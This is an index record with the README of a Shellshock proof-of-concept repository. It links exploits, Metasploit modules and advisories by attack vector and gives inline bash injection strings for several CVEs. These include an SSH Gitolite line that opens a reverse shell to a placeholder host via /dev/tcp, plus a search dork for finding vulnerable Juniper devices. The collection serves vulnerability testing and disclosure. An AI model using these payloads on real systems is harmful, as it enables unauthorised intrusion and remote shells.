{"id":13516753,"url":"https://github.com/mubix/shellshocker-pocs","last_synced_at":"2025-04-12T20:42:01.434Z","repository":{"id":21212760,"uuid":"24525672","full_name":"mubix/shellshocker-pocs","owner":"mubix","description":"Collection of Proof of Concepts and Potential Targets for #ShellShocker","archived":false,"fork":false,"pushed_at":"2020-05-16T12:26:23.000Z","size":57,"stargazers_count":888,"open_issues_count":2,"forks_count":190,"subscribers_count":113,"default_branch":"master","last_synced_at":"2025-04-04T00:07:43.468Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mubix.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2014-09-27T06:57:22.000Z","updated_at":"2025-02-12T13:58:37.000Z","dependencies_parsed_at":"2022-07-27T02:02:02.208Z","dependency_job_id":null,"html_url":"https://github.com/mubix/shellshocker-pocs","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mubix%2Fshellshocker-pocs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mubix%2Fshellshocker-pocs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mubix%2Fshellshocker-pocs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mubix%2Fshellshocker-pocs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mubix","download_url":"https://codeload.github.com/mubix/shellshocker-pocs/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248631668,"owners_count":21136554,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T05:01:25.506Z","updated_at":"2025-04-12T20:42:01.414Z","avatar_url":"https://github.com/mubix.png","language":"Python","funding_links":[],"categories":["Python","Technical","\u003ca id=\"8c5a692b5d26527ef346687e047c5c21\"\u003e\u003c/a\u003e收集"],"sub_categories":["ramanihiteshc@gmail.com"],"readme":"Shellshocker - Repository of \"Shellshock\" Proof of Concept Code\n=================\n\nCollection of Proof of Concepts and Potential Targets for #ShellShocker\n\nWikipedia Link: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details\n\nPlease submit a pull request if you have more links or other resources\n\n**Speculation:(Non-confirmed possibly vulnerable)** \n\n+ XMPP(ejabberd)\n+ ~~Mailman~~ - [confirmed not vulnerable](http://www.mail-archive.com/mailman-users%40python.org/msg65380.html)\n+ MySQL\n+ NFS\n+ Bind9\n+ Procmail [see](https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html)\n+ Exim [see](https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html)\n+ Juniper Google Search`inurl:inurl:/dana-na/auth/url_default/welcome.cgi`\n  + via: https://twitter.com/notsosecure/status/516132301025984512\n  + via: http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10648\u0026actp=RSS\n+ Cisco Gear\n  + via: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n+ FreePB / Asterix [patched here](http://community.freepbx.org/t/cve-2014-6271-shellshock-bash-exploit/24431)\n\n**If you know of PoCs for any of these, please submit an issue or pull request with a link.**\n\n## Command Line (Linux, OSX, and Windows via Cygwin)\n\n+ [bashcheck](https://github.com/hannob/bashcheck) - script to test for the latest vulns\n\n### CVE-2014-6271\n+ `env X='() { :; }; echo \"CVE-2014-6271 vulnerable\"' bash -c id`\n\n### CVE-2014-7169\n_will create a file named echo in cwd with date in it, if vulnerable_\n+ `env X='() { (a)=\u003e\\' bash -c \"echo date\"; cat echo`\n\n### CVE-2014-7186\n+ `bash -c 'true \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF' || echo \"CVE-2014-7186 vulnerable, redir_stack\"`\n\n### CVE-2014-7187\n+ `(for x in {1..200} ; do echo \"for x$x in ; do :\"; done; for x in {1..200} ; do echo done ; done) | bash || echo \"CVE-2014-7187 vulnerable, word_lineno\"`\n\n### CVE-2014-6278\n+ `env X='() { _; } \u003e_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :`\n+ Additional information: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n\n### CVE-2014-6277\n_will segfault if vulnerable_\n+ `env X='() { x() { _; }; x() { _; } \u003c\u003ca; }' bash -c :`\n+ Additional discussion on fulldisclosure: http://seclists.org/fulldisclosure/2014/Oct/9\n+ Additional information: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n\n\n\n## IBM z/OS - \n+ http://mainframed767.tumblr.com/post/98446455927/bad-news-is-it-totally-works-in-bash-on-z-os-and\n\n## HTTP\n+ Metasploit Exploit Module - [Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb)\n+ Metasploit Exploit Module - [Advantech Switch Bash Environment Variable Code Injection (Shellshock)](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb)\n+ Metasploit Exploit Module - [IPFire Bash Environment Variable Injection (Shellshock)](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ipfire_bashbug_exec.rb)\n+ HTTP Header Polution by @irsdl - http://pastebin.com/QNkf7dYS\n+ HTTP CGI-BIN - http://pastebin.com/166f8Rjx\n+ cPanel - http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html\n+ Digital Alert Systems DASDEC - http://seclists.org/fulldisclosure/2014/Sep/107\n+ F5 - https://twitter.com/securifybv/status/515035044294172673\n  + https://twitter.com/securifybv/status/515035044294172673/photo/1\n  + https://twitter.com/avalidnerd/status/515056463589675008\n    + https://twitter.com/avalidnerd/status/515056463589675008/photo/1\n+ Invisiblethreat.ca - https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\n+ Commandline version - https://gist.github.com/mfadzilr/70892f43597e7863a8dc\n+ User-Agent based walkthrough with LiveHTTPHeaders - http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/\n+ User-Agent based walkthrough with Burp - http://oleaass.com/shellshock-proof-of-concept-reverse-shell/\n+ User-Agent based but supports Tor and Socks5 (Python) - https://github.com/lnxg33k/misc/blob/master/shellshock.py\n+ User-Agent based in Ruby - https://github.com/securusglobal/BadBash\n+ Header based simple scanner using sleep with multithread support - https://github.com/gry/shellshock-scanner\n+ [shocker](https://github.com/nccgroup/shocker) - Checks across a list of URLs in a file, or a single URL, against a list of known vulnerable CGI resources (Content-type Method)\n+ Xymon - https://lists.xymon.com/archive/2014-September/040350.html\n+ QNAP - https://www.exploit-db.com/exploits/36503\n\n## Phusion Passenger\n+ https://news.ycombinator.com/item?id=8369776 \n\n## DHCP\n+ Trusted sec exploitation via Tftpd32 - https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/\n+ Metasploit Exploit Module - [Dhclient Bash Environment Variable Injection (Shellshock)](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/dhcp/bash_environment.rb)\n+ Metasploit Auxiliary Module - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb\n+ Perl Script - http://pastebin.com/S1WVzTv9\n+ using a Wi-Fi pineapple to force people to join the network - http://d.uijn.nl/?p=32\n\n## SSH\n+ Stack Overflow - http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh\n+ SSH ForcedCommand - https://twitter.com/JZdziarski/status/515205581226123264\n  + https://twitter.com/JZdziarski/status/515205581226123264/photo/1\n+ SendEnv: `LC_X='() { :; }; echo vulnerable' ssh foo@bar.org -o SendEnv=LC_X`\n+ Gitolite - https://twitter.com/Grifo/status/515089986161766400\n  + $ `ssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i \u003e\u0026 /dev/tcp/REVERSESHELLIP/PORT 0\u003e\u00261'`\n  + (necessary to have a git account on the server)\n\n## OSX \n+ Priv Escalation via VMware Fusion - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb\n+ Fix: http://support.apple.com/kb/DL1769\n\n## OSX - with reverse DNS (CVE-2014-3671.txt)\n+ Example zone file: [in-addr.arpa](osx-rev-ptr/in-addr.arpa.zone) that contains a CVE-2014-6271 example.\n+ Example file with a getnameinfo() that passes on to setenv(): [osx-rev-ptr.c](osx-rev-ptr/osx-rev-ptr.c)\n + Advisory with description of above [CVE-2014-3671.txt ](osx-rev-ptr/CVE-2014-3671.txt)\n\n## SIP\n+ SIP Proxies: https://github.com/zaf/sipshock\n\n\n## Qmail\n+ Detailed walkthrough - http://marc.info/?l=qmail\u0026m=141183309314366\u0026w=2\n+ Tweet from @ymzkei5 - http://twitter.com/ymzkei5/status/515328039765307392\n  + http://twitpic.com/ec3615\n  + http://twitpic.com/ec361o\n\n## Postfix\n+ http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt\n\n## FTP\n+ Pure-FTPd: https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc\n+ Metasploit Exploit Module - [Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb)\n\n## OpenVPN\n+ OpenVPN - https://news.ycombinator.com/item?id=8385332\n+ PoC Walkthrough by @fj33r - http://sprunge.us/BGjP\n\n## Oracle\n+ [Alert and list of affected Products](http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html)\n\n## TMNT\n+ https://twitter.com/SynAckPwn/status/514961810320293888/photo/1\n\n## Hand\n+ Via @DJManilaIce - http://pastie.org/9601055\n```\nuser@localhost:~$ env X='() { (a)=\u003e\\' /bin/bash -c \"shellshocker echo -e \\\"           __ __\\n          /  V  \\ \\n     _    |  |   |\\n    / \\   |  |   |\\n    |  |  |  |   |\\n    |  |  |  |   |\\n    |  |__|  |   |\\n    |  |  \\  |___|___\\n    |  \\   |/        \\ \\n    |   |  |______    |\\n    |   |  |          |\\n    |   \\__'   /     |\\n    \\        \\(     /\\n     \\             /\\n      \\|            |\\n\\\"\"; cat shellshocker\n/bin/bash: X: line 1: syntax error near unexpected token `='\n/bin/bash: X: line 1: `'\n/bin/bash: error importing function definition for `X'\n           __ __\n          /  V  \\ \n     _    |  |   |\n    / \\   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \\  |___|___\n    |  \\   |/        \\ \n    |   |  |______    |\n    |   |  |          |\n    |   \\__'   /     |\n    \\        \\(     /\n     \\             /\n      \\|            |\n\n```\n\n## CUPS\n+ Metasploit Exploit Module - [CUPS Filter Bash Environment Variable Code Injection](https://github.com/rapid7/metasploit-framework/pull/4050)\n\n## IRC\n+ Metasploit Exploit Module - [Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/xdh_x_exec.rb)\n+ Metasploit Exploit Module - [Legend Perl IRC Bot Remote Code Execution](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/legend_bot_exec.rb)\n\n## Scripts from @primalsec\n+ `shell_shocker.py` - Good for interacting with a known vulnerable URL to pass commands (User-Agent Method)\n+ `w3af_shocker.py` - Automates the process of running a w3af spider/shell\\_shock scan (User-Agent Method)\n+ `shell_sprayer.py` - Checks across a list of URLs in a file, or a single URL against a known list of cgi-bin resources (User-Agent Method)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmubix%2Fshellshocker-pocs","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmubix%2Fshellshocker-pocs","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmubix%2Fshellshocker-pocs/lists"}